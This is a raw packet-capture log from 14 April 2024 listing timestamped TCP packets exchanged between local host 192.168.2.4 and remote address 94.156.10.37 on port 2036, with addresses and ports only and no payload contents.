Apr 14, 2024 08:45:13.194596052 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194607973 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.194633961 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194670916 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194686890 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.194709063 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194746017 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194761038 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.194783926 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194820881 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194858074 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.194859028 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194899082 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194912910 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.194940090 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194977045 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194998980 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.195014000 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195050955 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195086956 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195091009 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.195125103 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195132971 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.195168018 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195204973 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195221901 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.195241928 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195291042 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195308924 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.195329905 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195368052 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195384026 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.195408106 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195445061 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195456028 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.195487022 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195524931 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195554972 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.195564985 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195605040 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195641994 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195677996 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195714951 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195725918 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.195753098 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195770979 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.195785999 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.195791960 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195831060 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195835114 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.195858955 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.195878029 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195914984 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195931911 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.195952892 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.195991039 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196001053 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.196029902 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196068048 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196089983 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.196106911 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196146011 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196172953 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.196182013 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196233034 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.196245909 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196293116 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196330070 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196346998 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.196367979 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196405888 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196417093 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.196445942 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196481943 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196501017 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.196520090 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196561098 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196578979 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.196598053 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196635962 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196651936 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.196675062 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196712017 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196727037 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.196751118 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196789026 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.196804047 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.203895092 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.203950882 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.211591959 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.211667061 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.407166958 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407284975 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407324076 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407345057 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407368898 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407390118 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407412052 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407433033 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407469988 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407509089 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407520056 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.407547951 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407586098 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407593966 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.407624006 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407644987 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.407663107 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407701969 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407716036 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.407741070 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407777071 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407793999 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.407814980 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407850027 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407866001 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.407891989 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407931089 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.407946110 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.407968044 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408004045 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408020973 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.408041954 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408077002 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408096075 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.408113956 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408153057 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408173084 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.408190012 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408262968 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408276081 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.408299923 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408338070 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408355951 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.408375978 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408413887 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408430099 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.408451080 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408488989 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408505917 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.408526897 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408565044 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408579111 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.408605099 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408643007 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408658981 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.408680916 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408718109 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408751011 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.408754110 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408792973 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408811092 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.408830881 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408869028 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408889055 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.408909082 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408945084 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.408967972 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.408982992 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.409020901 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.409044027 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.409058094 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.409096003 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.409116030 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.409133911 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.409173965 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.409193993 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.418906927 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.418968916 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.418982029 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.419011116 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419053078 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419071913 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.419091940 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419131994 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419152021 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.419173002 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419212103 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419230938 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.419250011 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419286966 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419306993 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.419327974 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419364929 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419378996 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.419404030 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419444084 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419464111 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.419481993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419523001 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419542074 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.419559956 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419598103 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419610023 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.419636011 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419672966 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419702053 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.419711113 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419749022 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419761896 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.419787884 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419826031 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419847012 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.419862986 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419899940 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419919968 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.419939041 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419975996 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.419996023 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.420015097 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.420053005 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.420070887 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.422288895 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422329903 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422364950 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.422370911 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422410965 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422430038 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.422449112 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422487020 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422508955 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.422524929 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422561884 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422580004 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.422604084 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422641993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422655106 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.422682047 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422723055 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422743082 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.422760963 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422797918 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422817945 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.422835112 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422872066 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422895908 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.422910929 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422947884 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.422971010 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.422986031 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423029900 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423047066 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.423069954 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423105955 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423126936 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.423146963 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423182964 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423198938 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.423221111 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423259020 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423279047 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.423295975 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423335075 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423356056 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.423372984 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423410892 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423429966 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.423449039 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423485994 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423506021 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.423522949 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423558950 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423578978 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.423594952 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423631907 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423654079 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.423670053 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423707962 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423729897 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.423746109 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423783064 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423805952 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.423820019 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423856974 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423875093 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.423893929 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423932076 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.423953056 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.423969030 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424005985 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424041033 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.424041986 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424081087 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424098969 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.424118042 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424156904 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424185991 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.424194098 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424262047 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424299955 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424307108 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.424336910 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424367905 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.424376965 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424417019 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424444914 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.424453020 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424493074 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424509048 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.424530983 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424568892 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424586058 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.424607038 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424643993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424671888 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.424681902 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424719095 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424736977 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.424755096 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424794912 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424827099 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.424830914 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424869061 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424890041 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.424926043 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424962044 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.424977064 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.424999952 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.425036907 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.425056934 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.425075054 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.425084114 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.425117016 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.425148010 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.425154924 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.425173044 CEST	49736	2036	192.168.2.4	94.156.10.37
